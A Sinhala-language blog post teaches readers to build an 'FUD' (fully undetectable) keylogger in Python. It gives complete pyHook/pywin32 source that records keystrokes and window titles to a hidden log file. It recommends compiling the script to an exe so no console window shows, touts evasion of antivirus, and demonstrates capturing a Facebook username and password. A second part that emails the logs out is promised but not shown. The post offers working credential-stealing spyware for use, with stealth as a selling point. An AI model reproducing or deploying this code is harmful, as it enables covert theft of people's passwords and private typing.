FUD Keylogger එකක් අපිම හදා ගමු..

අද මම කියන්න යන්නේ ඔයාලම keylogger එකක් program කරගන්න විදිහ..මම මේකට භාවිතා කරන්නේ python language එක..
මේ ලිපියෙදි මම මේ විදිහට හදා ගන්න keylogger එකෙන් පරිගනකයක keystroke ඔක්කොම ඒ පරිගනකය ඇතුලෙම කොහෙ හරි save වෙන විදිහේ keylogger එකක් හදන්න කියලා දෙනවා..මේකේ දෙවනි කොටසෙදි ඒ save කරගත්ත data අපිට email එකකින් ගෙන්නගන්න මේක develop කරන්න කියලා දෙනවා..
මේ විදිහට ඔයාලම keylogger එකක් හදා ගන්න එකේ ගොඩක් වාසි තියනවා..ඒවගෙන් ටිකක් තමා ප්‍රසිද්ද Keyloggers ගොඩක් virus guard වලින් අල්ලනවා..ඒත් ඔයාම එකක් හදා ගන්නවා නම් ඒ කරදරේ නෑ..අනිත් එක තමා  ඔයා කොහෙන්හරි download කරන keylogger එකක් ඇතුලේ තවත් මොකක් හරි malicious file එකක් තියෙයිද කියලා කියන්න බෑනේ..ඒ නිසා මේ විදිහට ඔයාම එකක් හදා ගත්තොත් ඒ ගැන බය වෙන්න දෙයක් නෑ..ඔන්න ඔය වගේ වාසි ගොඩක් තියනවා..එහෙනම් අපි වැඩේ පටන් ගමු..

මම මේකට පාවිච්චි කරනවා විශේෂ module 2ක්..ඒවා built in module නෙමේ..ඒ නිසා ඔයාල මුලින්ම ඒවා download කරලා install කරගන්න..්
pyHook-http://sourceforge.net/projects/pyhook/
pywin32-http://sourceforge.net/projects/pywin32/files/

හරි දැන් ඒ් module install කරගන්න..
දැන් මම ඔයාලට සම්පූර්න code එක  ‍දෙන්නම්..

import pyHook,pythoncom
global re,c,x
re=''''''
c=True
x=0
def log(event):
        global re,c,x
        window=event.WindowName
        key=chr(event.Ascii)
        print chr(event.Ascii)
        if c:
                re+='\n'+window+'\n'
        re+=key
        c=False
        if x>=10:
                myfile=open('log.txt','a')
                myfile.write(re)
                myfile.close()
                re=''''''
                x=0
        return True
def mouse(event):
        global re,c,x
        x+=1
        print re
        print x
        c=True
        return True
       
manager=pyHook.HookManager()
manager.SubscribeKeyDown(log)
manager.HookKeyboard()

manager2=pyHook.HookManager()
manager2.MouseLeftDown=mouse
manager2.HookMouse()

pythoncom.PumpMessages()

දැන් මම මේකෙන් වෙන දේ කියන්නම්..මුලින්ම මේකෙදි pyHook module එක භාවිතා කරලා තියනවා keystroke අල්ල ගන්න..pythoncom module එකෙන් මේ loop එක දිගටම පවත්වාගෙන යන්ඩ සහ key messages අල්ල ගන්ඩ.. මේකෙදි මේ විදිහට අල්ල ගන්න keystrokes අපි එක දිගටම stoරe කරගත්තොත් program කිහිපයක keystroke ලැබෙද්දි ඒවා අපිලිවෙල නිසා pyHook module එකම පාවිච්චි කරලා තියනවා left mouse clicks අදුරගන්න..ඉතින් අපි එක program එකකින් තවත් එකකට මාරු වෙද්දි 99% ක් වෙලාවටම mouse click එකක් කරනවාමනේ..ඉතින් ඒ නිසා මම මෙතනදි mouse click එකක් කරපු ගමන් ඊලග පේලියේ keystroke සේව් වෙන විදිහට තමා මේක මම හදලා තියෙන්නේ..එතකොට මේකෙදි mouse click 10ක් වෙනකන් keystroke සේව් වෙන්නේ re කියන string එක විදිහට program එක ඇතුලෙමයි....ඊට පස්සේ python දාලා තියන directory එකේම log.txt ෆයිල් එකේ මේවා සේව් වෙනවා..මේ විදිහට mouse click 10කට වතාවක් සේව් වීම සිද්ද වෙනවා.. 

ඔන්න ඕක තමා මේකෙදි වෙන්නේ..එතකොට මේක python script එකක් විදිහටම run කරන්න ගියොත් console එක open වෙනවනේ..ඒ නිසා මේක exe එකකට convert කරන්න ඕනේ.. 

ඔන්න තියනවා මම ඒ විදිහට හදා ගත්ත එක..

දැන් ම මෙක execute කරලා Facebook එකට ගිහින් බොරු username password ගහලා ලොග් වෙන්න බලනවා..

 



මම මෙතනදි password එක විදිහට ගැහුවේ testing කියලා..
ඔන්න දැන් keylogger එක තියන තැනම log.txt හැදිලා තියනවා..



ඔන්න තියනවා අර මම ගහපු username & password save වෙලා..හැබැයි මෙතනදිම මේකේ පොඩි අවුලක් පේන්න තියනවා නේද??ඒ තමා මේක Unicode වලට වැඩ නෑ..ඔය කොටු කොටු වගේ වැදිලා තියෙන්නේ මම මේ post එක ගහද්දි capture කරගත්ත unicode.
එ්ත් ඉතින් unicode වලින් password දාන අය අඩුයිනේ..ඒ නිසා ඒක එච්චර ලොකු ප්‍රශ්නයක් නෙමේ..

Share on Google Plus

About REX

    Blogger Comment
    Facebook Comment

2 comments: